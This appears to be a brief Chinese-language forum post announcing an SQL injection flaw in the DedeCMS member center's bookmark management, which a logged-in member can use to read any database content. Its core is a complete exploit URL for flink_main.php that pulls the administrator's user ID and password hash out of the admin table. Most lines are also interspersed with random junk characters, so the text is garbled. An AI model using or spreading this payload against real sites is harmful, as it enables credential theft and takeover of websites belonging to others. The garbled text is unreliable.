DedeCMS会员中心SQL注射漏洞
% q* S r$ G5 u8 A3 F( D需要magic_quotes_gpc = Off
! F; k$ w- e4 z会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
2 d! O2 |' z! c) j
7 p; c u" H/ I, [ l' v$ M1 KDedeCMS会员中心书签管理SQL注射漏洞1 g9 s0 {: t, T8 z; R4 F
成功利用该漏洞可获得管理员密码6 O% \+ { I" _ _
3 R" X' Z3 k$ Z会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
6 Q- [; E9 @% O: i ) o: }: D7 R- @ V
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r9 B. Q% \4 h ^" n+ c
|